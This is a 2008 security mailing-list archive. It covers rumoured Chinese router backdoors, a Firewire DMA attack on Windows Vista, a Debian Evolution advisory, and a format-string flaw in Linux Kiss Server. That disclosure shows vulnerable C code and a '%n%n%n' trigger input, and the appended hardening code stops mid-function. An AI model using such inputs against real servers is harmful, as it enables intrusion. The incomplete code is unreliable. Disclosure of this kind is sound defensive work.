pwned my toothpaste and gave me diarrhea :( :( :( > > H A C K E D B Y C H I N E S E, LOLOLOLOLOL > > titan rain is dark comedy at its finest! 
> > (( how many orgs / govs actually do due diligence and audit third > party hardware / software / systems they purchase ?? )) shut up coderman, this is actually a serious subject. there was even a .mil report about it that i spammed to the list a not long back :) no one paid attention though: http://www.thetrumpet.com/index.php?q=4524.2780.0.0 http://www.govexec.com/story_page.cfm?articleid=38713&dcn=todaysnews this is actually a serious subject i wanted securityfocus to cover but they ignored my e-mails! i also contacted cnet news at the time and they ignored my e-mails. pay attention to the security community next time! we're telling you things we want you to put in your news articles to send signals to the government but you ignore us. what's the point of this mailing list being here if the media won't work with the underground to send messages to the high ups in our corrupt governments? fuck the media! :) http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/058845.html http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/058850.html Date: Wed, 5 Dec 2007 08:33:09 +0000 From: n3td3v To: news-edi... at securityfocus.com, send-us-news-t... at cnet.com, Subject: Fwd: Report: Foreign Countries Develop U.S. Defense Systems Software Please can you publish this, America deserves to know how stupid Bush admin are. OK, we already knew how stupid they are, but please publish this cnet and securityfocus editors, it's time to get the Bush admin and MI5 back for spewing all that anti-China propaganda to the media recently. Bush admin and MI5 are a bunch of incompetent bastards putting our national security at risk, how dare they put national security at risk by outsourcing its .mil software to the number 1 cyber enemy, CHINA. The truth comes out in the end!!! It's too LOL to be true. PUBLISH PUBLISH PUBLISH!!!!!!! The American people deserve to know the truth!!!!!!
From quispiam.lepidus at gmail.com Thu Mar 6 01:26:47 2008 From: quispiam.lepidus at gmail.com (quispiam lepidus) Date: Thu, 6 Mar 2008 12:26:47 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> Message-ID: Typical media dramatization. Nowhere in the article does it state that backdoors HAVE been found in router firmwares. Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota trunks" > > On Thu, Mar 6, 2008 at 10:09 AM, Ivan . wrote: > > > > > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080306/cf3b6cd1/attachment.html From Larry at larryseltzer.com Thu Mar 6 01:37:39 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Wed, 5 Mar 2008 20:37:39 -0500 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> Message-ID: <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> >>Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota trunks" And who knows what the French are putting in that cheese. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com -------------- next part -------------- An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/42fb95f5/attachment.html From times at krr.org Thu Mar 6 01:47:44 2008 From: times at krr.org (Times Enemy) Date: Wed, 05 Mar 2008 18:47:44 -0700 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> Message-ID: <47CF4D40.1000107@krr.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Greets. It does not matter so much if there is no hard proof about the router firmware containing backdoors set in place by Chinese manufacturers. ~From a security perspective, it is a potential threat which should be addressed, especially for western networks and those they trust. It is not too far fetched of an idea. Google yielded the following fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml If you want to be inundated with reading material on the matter, be creative, or not too creative, with Google searches having to do with China and western powers and businesses, specific to information warfare. .te Larry Seltzer wrote: |>> Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota | trunks" | | And who knows what the French are putting in that cheese. | Larry Seltzer | eWEEK.com Security Center Editor | http://security.eweek.com/ | | http://blogs.pcmag.com/securitywatch/ | | Contributing Editor, PC Magazine | larry.seltzer at ziffdavisenterprise.com | | | | | ------------------------------------------------------------------------ | | _______________________________________________ | Full-Disclosure - We believe in it. 
| Charter: http://lists.grok.org.uk/full-disclosure-charter.html | Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ =RwKm -----END PGP SIGNATURE----- From ivanhec at gmail.com Thu Mar 6 01:58:11 2008 From: ivanhec at gmail.com (Ivan .) Date: Thu, 6 Mar 2008 12:58:11 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <47CF4D40.1000107@krr.org> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> <47CF4D40.1000107@krr.org> Message-ID: <6450e99d0803051758w73938649m9efbd4129930f639@mail.gmail.com> there is also the case of fake Cisco routers etc doing the rounds. Whether these devices are back doored is anyones guess http://news.zdnet.co.uk/communications/0,1000000085,39284348,00.htm http://www.voipforyourbusiness.com/index.php?option=com_content&task=view&id=115&Itemid=1 On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Greets. > > It does not matter so much if there is no hard proof about the router > firmware containing backdoors set in place by Chinese manufacturers. > ~From a security perspective, it is a potential threat which should be > addressed, especially for western networks and those they trust. > > It is not too far fetched of an idea. Google yielded the following > fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml > > If you want to be inundated with reading material on the matter, be > creative, or not too creative, with Google searches having to do with > China and western powers and businesses, specific to information warfare. 
> > .te > > > Larry Seltzer wrote: > |>> Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota > | trunks" > | > | And who knows what the French are putting in that cheese. > | Larry Seltzer > | eWEEK.com Security Center Editor > | http://security.eweek.com/ > | > | http://blogs.pcmag.com/securitywatch/ > | > | Contributing Editor, PC Magazine > | larry.seltzer at ziffdavisenterprise.com > | > | > | > | > | ------------------------------------------------------------------------ > | > | _______________________________________________ > | Full-Disclosure - We believe in it. > | Charter: http://lists.grok.org.uk/full-disclosure-charter.html > | Hosted and sponsored by Secunia - http://secunia.com/ > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.8 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko > a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ > =RwKm > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From quispiam.lepidus at gmail.com Thu Mar 6 02:28:48 2008 From: quispiam.lepidus at gmail.com (quispiam lepidus) Date: Thu, 6 Mar 2008 13:28:48 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <47CF4D40.1000107@krr.org> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> <47CF4D40.1000107@krr.org> Message-ID: Why stop at routers & switches? You could own far more devices by backdooring BIOS', HDD's, etc, all of which are often produced in "Far East countries". On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Greets. 
> > It does not matter so much if there is no hard proof about the router > firmware containing backdoors set in place by Chinese manufacturers. > ~From a security perspective, it is a potential threat which should be > addressed, especially for western networks and those they trust. > > It is not too far fetched of an idea. Google yielded the following > fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml > > If you want to be inundated with reading material on the matter, be > creative, or not too creative, with Google searches having to do with > China and western powers and businesses, specific to information warfare. > > .te > > > Larry Seltzer wrote: > |>> Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota > | trunks" > | > | And who knows what the French are putting in that cheese. > | Larry Seltzer > | eWEEK.com Security Center Editor > | http://security.eweek.com/ > | > | http://blogs.pcmag.com/securitywatch/ > | > | Contributing Editor, PC Magazine > | larry.seltzer at ziffdavisenterprise.com > | > | > | > | > | ------------------------------------------------------------------------ > | > | _______________________________________________ > | Full-Disclosure - We believe in it. > | Charter: http://lists.grok.org.uk/full-disclosure-charter.html > | Hosted and sponsored by Secunia - http://secunia.com/ > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.8 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko > a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ > =RwKm > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080306/6f6a7184/attachment.html From ivanhec at gmail.com Thu Mar 6 02:45:10 2008 From: ivanhec at gmail.com (Ivan .) Date: Thu, 6 Mar 2008 13:45:10 +1100 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> <47CF4D40.1000107@krr.org> Message-ID: <6450e99d0803051845r70811cbaub647249036f1f767@mail.gmail.com> I don't think they have http://www.hqlaptops.com/hard-drives/infected-seagate-hard-drives http://www.taipeitimes.com/News/taiwan/archives/2007/11/11/2003387202 On Thu, Mar 6, 2008 at 1:28 PM, quispiam lepidus wrote: > Why stop at routers & switches? You could own far more devices by > backdooring BIOS', HDD's, etc, all of which are often produced in "Far East > countries". > > > > On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy wrote: > > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > Greets. > > > > It does not matter so much if there is no hard proof about the router > > firmware containing backdoors set in place by Chinese manufacturers. > > ~From a security perspective, it is a potential threat which should be > > addressed, especially for western networks and those they trust. > > > > It is not too far fetched of an idea. Google yielded the following > > fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml > > > > If you want to be inundated with reading material on the matter, be > > creative, or not too creative, with Google searches having to do with > > China and western powers and businesses, specific to information warfare. > > > > .te > > > > > > > > Larry Seltzer wrote: > > |>> Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota > > | trunks" > > | > > | And who knows what the French are putting in that cheese.
> > | Larry Seltzer > > | eWEEK.com Security Center Editor > > | http://security.eweek.com/ > > > > | > > | http://blogs.pcmag.com/securitywatch/ > > | > > | Contributing Editor, PC Magazine > > | larry.seltzer at ziffdavisenterprise.com > > | > > | > > | > > | > > | ------------------------------------------------------------------------ > > > > | > > | _______________________________________________ > > | Full-Disclosure - We believe in it. > > | Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > | Hosted and sponsored by Secunia - http://secunia.com/ > > -----BEGIN PGP SIGNATURE----- > > Version: GnuPG v1.4.8 (MingW32) > > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > > > iEYEARECAAYFAkfPTUAACgkQVuM8PD1UnspxGwCfWA2YAcAk31lPkOeFUkOZm4ko > > a64AniF5C+KgjpfrAuxEkkW45BM+xpGZ > > =RwKm > > -----END PGP SIGNATURE----- > > > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From slash.pd at gmail.com Thu Mar 6 02:50:47 2008 From: slash.pd at gmail.com (Peter Dawson) Date: Wed, 5 Mar 2008 21:50:47 -0500 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: <47CF4D40.1000107@krr.org> References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> <47CF4D40.1000107@krr.org> Message-ID: <8f1f7b60803051850v71805a65lb5d8fd4919b21df8@mail.gmail.com> Operation infrastructure http://www.cbp.gov/xp/cgov/newsroom/news_releases/02222008.xml On Wed, Mar 5, 2008 at 8:47 PM, Times Enemy wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > > It is not too far fetched of an idea. Google yielded the following > fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/ea62f2db/attachment.html From times at krr.org Thu Mar 6 02:56:41 2008 From: times at krr.org (Times Enemy) Date: Wed, 05 Mar 2008 19:56:41 -0700 Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware" In-Reply-To: References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252EF2@becca.LarrySeltzer.local> <47CF4D40.1000107@krr.org> Message-ID: <47CF5D69.6000309@krr.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Greetings. I agree, that the threat does not stop at firmware for routers and switches. Even with open source, or dare i type, even more so with open source, the threat for maliciously modified code exists. This is not a new threat, per se, however, it is a growing threat which is fed by more and more hardware being built/assembled/manufactured/what-have-you in questionable countries/locations.
This is not isolated to the far east, though the far east is a perfectly
legitimate location for western users to NOT trust. I would venture to
state that eastern users have already accepted that their products may
have gone 1984 on them.

It does not give me warm fuzzies that the way the vast majority of
production appears, at least one part of most gizmos comes through the
far east. Without question, a security concern.

.te

quispiam lepidus wrote:
| Why stop at routers & switches? You could own far more devices by
| backdooring BIOS', HDD's, etc, all of which are often produced in "Far East
| countries".
|
| On Thu, Mar 6, 2008 at 12:47 PM, Times Enemy wrote:
|
| Greets.
|
| It does not matter so much if there is no hard proof about the router
| firmware containing backdoors set in place by Chinese manufacturers.
| From a security perspective, it is a potential threat which should be
| addressed, especially for western networks and those they trust.
|
| It is not too far fetched of an idea. Google yielded the following
| fairly quick: http://slashdot.org/articles/08/02/29/1642221.shtml
|
| If you want to be inundated with reading material on the matter, be
| creative, or not too creative, with Google searches having to do with
| China and western powers and businesses, specific to information warfare.
|
| .te
|
| Larry Seltzer wrote:
| |>> Next we'll be seeing "Japanese tactical nukes "Hidden in Toyota
| | trunks"
| |
| | And who knows what the French are putting in that cheese.
| | Larry Seltzer
| | eWEEK.com Security Center Editor
| | http://security.eweek.com/
| |
| | http://blogs.pcmag.com/securitywatch/
| |
| | Contributing Editor, PC Magazine
| | larry.seltzer at ziffdavisenterprise.com

From them.root at gmail.com Thu Mar 6 03:06:28 2008
From: them.root at gmail.com (TheM .)
Date: Wed, 5 Mar 2008 22:06:28 -0500
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <096A04F511B7FD4995AE55F13824B8332F1E35@contoso>
References: <1204732416.6997.53.camel@b4byl0n>
 <096A04F511B7FD4995AE55F13824B8332F1E35@contoso>
Message-ID: <96774a650803051906y994ac78qd5b883cf62892f62@mail.gmail.com>

I believe their work is an expansion of this:
http://www.theage.com.au/news/security/hack-into-a-windows-pc-no-password-needed/2008/03/04/1204402423638.html,
which demonstrated the vuln. in XP (and, according to the paper, it's been
demonstrated with other OS's as well), and their work was specifically
done on showing the problem in Vista, which hadn't (as far as the paper
writer seems to know) been done before.

Maus

On Wed, Mar 5, 2008 at 4:30 PM, Roger A. Grimes wrote:

> As somewhat indicated in the paper itself, these types of physical DMA
> attacks are possible against any PC-based OS, not just Windows. If that's
> true, why is the paper titled around Windows Vista?
>
> I guess it makes headlines faster. But isn't as important, if not more
> important, to say all PC-based systems have the same underlying problem?
> That it's a broader problem needing a broader solution, instead of picking
> on one OS vendor to get headlines?
>
> [Disclaimer: I'm a full-time Microsoft employee.]
>
> Roger
>
> *****************************************************************
> *Roger A. Grimes, InfoWorld, Security Columnist
> *CPA, CISSP, CISA, MCSE: Security (2000/2003), CEH, yada...yada...
> *email: roger_grimes at infoworld.com or roger at banneretcs.com
> *Author of Windows Vista Security: Securing Vista Against Malicious
> Attacks (Wiley)
> *
> http://www.amazon.com/Windows-Vista-Security-Securing-Malicious/dp/0470101555
> *****************************************************************
>
>
> -----Original Message-----
> From: Bernhard Mueller [mailto:research at sec-consult.com]
> Sent: Wednesday, March 05, 2008 10:54 AM
> To: Full Disclosure; Bugtraq
> Subject: Firewire Attack on Windows Vista
>
> Hello,
>
> In the light of recent discussions about firewire / DMA hacks, we would
> like to throw in some of the results of our past research on this topic
> (done mainly by Peter Panholzer) in the form of a short whitepaper. In this
> paper, we demonstrate that the firewire unlock attack (as implemented in
> Adam Boileau's winlockpwn) can be used against Windows Vista.
>
> The paper is available at:
>
> http://www.sec-consult.com/fileadmin/Whitepapers/Vista_Physical_Attacks.pdf
>
>
> Best regards,
>
> Bernhard
>
>
> --
> _________________________________________
>
> Bernhard Mueller
> Security Consultant
>
> SEC Consult Unternehmensberatung GmbH
> www.sec-consult.com
>
> A-1190 Vienna, Mooslackengasse 17
> phone +43 1 8903043 34
> fax +43 1 8903043 15
> mobile +43 676 840301 718
> email b.mueller at sec-consult.com
>
> Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
> Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt
>
> Advisor for your information security.
>

From thijs at debian.org Wed Mar 5 14:43:46 2008
From: thijs at debian.org (Thijs Kinkhorst)
Date: Wed, 5 Mar 2008 15:43:46 +0100 (CET)
Subject: [Full-disclosure] [SECURITY] [DSA 1512-1] New evolution packages fix arbitrary code execution
Message-ID: <20080305144346.7E8DC326C4B@morgana.loeki.tv>

------------------------------------------------------------------------
Debian Security Advisory DSA-1512-1                  security at debian.org
http://www.debian.org/security/                           Thijs Kinkhorst
March 05, 2008                        http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : evolution
Vulnerability  : format string attack
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-0072

Ulf Härnhammar discovered that Evolution, the e-mail and groupware suite,
had a format string vulnerability in the parsing of encrypted mail messages.
If the user opened a specially crafted email message, code execution was
possible.

For the stable distribution (etch), this problem has been fixed in version
2.6.3-6etch2.

For the old stable distribution (sarge), this problem has been fixed in
version 2.0.4-2sarge3. Some architectures have not yet completed building
the updated package for sarge at this time, they will be added as they
come available.

For the unstable distribution (sid), this problem has been fixed in
version 2.12.3-1.1.

We recommend that you upgrade your evolution package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From julio at rfdslabs.com.br Thu Mar 6 02:23:57 2008
From: julio at rfdslabs.com.br (Julio Cesar Fort)
Date: Wed, 05 Mar 2008 23:23:57 -0300
Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware"
Message-ID: <47CF55BD.8090208@rfdslabs.com.br>

Quoting PC Pro article: "SecureTest believes spyware could be easily
built into Asian-manufactured devices such as switches and routers,
providing a simple backdoor for companies or governments in the Far East
to listen in on communications."

It seems someone in this security company read "Breakpoint", by Richard
A. Clarke, stole his thoughts and is making claims without any proof
products were actually backdoored just to gain some media attention.

--
Julio Cesar Fort
Recife, PE, Brazil
www.rfdslabs.com.br - computers, sex, human mind, music and more.
PGP public key: http://www.rootshell.be/~sandimas/juliocesarfort.gpg

From iusr.jar at gmail.com Thu Mar 6 03:38:27 2008
From: iusr.jar at gmail.com (Jerome Jar)
Date: Thu, 6 Mar 2008 11:38:27 +0800
Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware"
In-Reply-To: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com>
References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com>
Message-ID: <1f2d0e290803051938t499b370dw47bece2224bb4f41@mail.gmail.com>

Come on, where are the evidences? Sounds pretty much like racialism.

Usually the engineers are having a hard time on even getting the
routers and switches functional for mass market; there won't be any
time left for them to plant well hidden backdoors.

On Thu, Mar 6, 2008 at 7:09 AM, Ivan . wrote:
> http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html
>

--
"Houston, we have a problem."

From Valdis.Kletnieks at vt.edu Thu Mar 6 04:28:43 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 05 Mar 2008 23:28:43 -0500
Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware"
In-Reply-To: Your message of "Thu, 06 Mar 2008 11:38:27 +0800."
 <1f2d0e290803051938t499b370dw47bece2224bb4f41@mail.gmail.com>
References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com>
 <1f2d0e290803051938t499b370dw47bece2224bb4f41@mail.gmail.com>
Message-ID: <11508.1204777723@turing-police.cc.vt.edu>

On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said:
> Come on, where are the evidences? Sounds pretty much like racialism.
>
> Usually the engineers are having a hard time on even getting the
> routers and switches functional for mass market; there won't be any
> time left for them to plant well hidden backdoors.

But that's the proof right there - the reason *why* they have so much
trouble getting the damned things to work is because they have to work
around the backdoors in the device... ;)

From measl at mfn.org Thu Mar 6 04:32:37 2008
From: measl at mfn.org (J.A. Terranson)
Date: Wed, 5 Mar 2008 22:32:37 -0600 (CST)
Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware"
In-Reply-To: <11508.1204777723@turing-police.cc.vt.edu>
References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com>
 <1f2d0e290803051938t499b370dw47bece2224bb4f41@mail.gmail.com>
 <11508.1204777723@turing-police.cc.vt.edu>
Message-ID:

On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said:
>> Come on, where are the evidences? Sounds pretty much like racialism.
>>
>> Usually the engineers are having a hard time on even getting the
>> routers and switches functional for mass market; there won't be any
>> time left for them to plant well hidden backdoors.
>
> But that's the proof right there - the reason *why* they have so much
> trouble getting the damned things to work is because they have to work
> around the backdoors in the device... ;)

Before we blow this off with a good laugh we should all remember the back
doors in other network gear. Even so-called "core equipment" (anyone
remember the backdoor into the [Nortel] Shasta (later known as "BSN
5000")?

Assuming that any unaudited gear has a backdoor is just common sense.

--
Yours,

J.A. Terranson
sysadmin_at_mfn.org
0xpgp_key_mgmt_is_broken-dont_bother

What religion, please tell me, tells you as a follower of that religion
to occupy another country and kill its people? Please tell me. Does
Christianity tell its followers to do that? Judaism, for that matter?
Islam, for that matter? What prophet tells you to send 160,000 troops to
another country, kill men, women, and children? You just can't wear your
religion on your sleeve or just go to church. You should be truthfully
religious.

Mahmoud Ahmadinejad

From iusr.jar at gmail.com Thu Mar 6 05:29:06 2008
From: iusr.jar at gmail.com (Jerome Jar)
Date: Thu, 6 Mar 2008 13:29:06 +0800
Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware"
In-Reply-To: <11508.1204777723@turing-police.cc.vt.edu>
References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com>
 <1f2d0e290803051938t499b370dw47bece2224bb4f41@mail.gmail.com>
 <11508.1204777723@turing-police.cc.vt.edu>
Message-ID: <1f2d0e290803052129v69c1b65et5d80f37e508efb95@mail.gmail.com>

OK, only if hidden backdoors are also part of their function specs...

I have friends in a router manufacturer. Besides basic functionalities
that a router must have, they usually have to deal with some ridiculous
requirements from customers.

Mmmm, I also start to suspect the customers *want* their backdoors ;-)

On Thu, Mar 6, 2008 at 12:28 PM, wrote:
> On Thu, 06 Mar 2008 11:38:27 +0800, Jerome Jar said:
> > Come on, where are the evidences? Sounds pretty much like racialism.
> >
> > Usually the engineers are having a hard time on even getting the
> > routers and switches functional for mass market; there won't be any
> > time left for them to plant well hidden backdoors.
>
> But that's the proof right there - the reason *why* they have so much
> trouble getting the damned things to work is because they have to work
> around the backdoors in the device... ;)
>

--
"Houston, we have a problem."

From peterw at usa.net Thu Mar 6 00:37:45 2008
From: peterw at usa.net (Peter Watkins)
Date: Wed, 5 Mar 2008 19:37:45 -0500
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <096A04F511B7FD4995AE55F13824B8332F1E35@contoso>;
 from roger@banneretcs.com on Wed, Mar 05, 2008 at 04:30:35PM -0500
References: <1204732416.6997.53.camel@b4byl0n>
 <096A04F511B7FD4995AE55F13824B8332F1E35@contoso>
Message-ID: <20080305193745.A25582@gwyn.tux.org>

On Wed, Mar 05, 2008 at 04:30:35PM -0500, Roger A. Grimes wrote:
> As somewhat indicated in the paper itself, these types of physical DMA
> attacks are possible against any PC-based OS, not just Windows. If that's
> true, why is the paper titled around Windows Vista?
>
> I guess it makes headlines faster. But isn't as important, if not more
> important, to say all PC-based systems have the same underlying problem?
> That it's a broader problem needing a broader solution, instead of picking
> on one OS vendor to get headlines?

Roger, you should note that Adam's "Hit by a Bus" paper includes
information about how Linux users can load their OS' Firewire driver in a
way that should disallow physical memory DMA access, and close this attack
vector. I have not yet seen anyone explain how to do the same in Windows.
If there is no such option in Windows (as the Panholzer paper claims),
then Microsoft deserves the negative attention.

> [Disclaimer: I'm a full-time Microsoft employee.]

As for "broader solutions", Microsoft is in an excellent position to help
improve the situation -- maybe you could shed some light on their efforts?

-Peter

From david.judais at googlemail.com Wed Mar 5 21:29:53 2008
From: david.judais at googlemail.com (David Judais)
Date: Wed, 5 Mar 2008 16:29:53 -0500
Subject: [Full-disclosure] Vulnerability in Linux Kiss Server v1.2
Message-ID: <66e421d70803051329n12d82a8etf4fc714258025c27@mail.gmail.com>

Why isn't there a patch?

> From: vashnukad at vashnukad.com
> Site: http://www.vashnukad.com

Application: Linux Kiss Server v1.2
Type: Format strings
Priority: Medium
Patch available: No

The Linux Kiss Server contains a format strings vulnerability that, if run
in foreground mode, can be leveraged for access. The vulnerability is
demonstrated in the code below:

Function log_message():

        if(background_mode == 0)
        {
                if(type == 'l')
                        fprintf(stdout,log_msg);

                if(type == 'e')
                        fprintf(stderr,log_msg);

                free(log_msg);
        }

Function kiss_parse_cmd():

        /* check full command name */
        if (strncmp(cmd, buf, cmd_len))
        {
                asprintf(&log_msg,"unknow command: `%s'", buf);
                log_message(log_msg,'e');
                goto error;
        }
        buf += cmd_len;

So putting something like %n%n%n in 'buf' you can trigger the vulnerability.

--
Name: Vashnukad
E-mail: vashnukad at vashnukad.com
Site: http://www.vashnukad.com

--
Name: Vashnukad
e-mail: vashnukad at vashnukad.com
Site: http://www.vashnukad.com
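
The two-stage flaw in the advisory above (a message built in kiss_parse_cmd() and then handed to fprintf() as the format in log_message()), with the logging stage rewritten to use a constant format. This is an added example, not code from the advisory or from the Linux Kiss Server project; the names build_unknown_cmd_msg, log_message_safe, log_fmt and count_format_directives are hypothetical, and the input is constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Audit helper: count printf conversion directives in untrusted text.
 * "%%" is a literal percent sign and is not counted. */
static size_t count_format_directives(const char *s)
{
    size_t n = 0;
    for (; *s != '\0'; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {          /* escaped percent sign */
            s++;
            continue;
        }
        if (s[1] != '\0')           /* a lone trailing '%' is not a directive */
            n++;
    }
    return n;
}

/* Stage 1 (kiss_parse_cmd): constant format, the untrusted command text is
 * only an argument. Returns the message length, or -1 if it did not fit. */
static int build_unknown_cmd_msg(char *dst, size_t cap, const char *buf)
{
    int n = snprintf(dst, cap, "unknow command: `%s'", buf);
    return (n < 0 || (size_t)n >= cap) ? -1 : n;
}

/* Stage 2 (log_message), hardened: the message is data for a constant "%s"
 * format, so directives inside it are printed, not interpreted. */
static int log_message_safe(const char *log_msg, char type)
{
    FILE *out = (type == 'l') ? stdout : (type == 'e') ? stderr : NULL;
    if (out == NULL)
        return -1;
    return fprintf(out, "%s\n", log_msg);
}

#if defined(__GNUC__)
#define PRINTF_LIKE(f, a) __attribute__((format(printf, f, a)))
#else
#define PRINTF_LIKE(f, a)
#endif

/* Variadic logger for call sites that need formatting. The attribute lets
 * -Wformat / -Wformat-security flag a caller that passes a non-literal
 * format with no arguments, which is the bug pattern in the advisory. */
static int log_fmt(char type, const char *fmt, ...) PRINTF_LIKE(2, 3);
static int log_fmt(char type, const char *fmt, ...)
{
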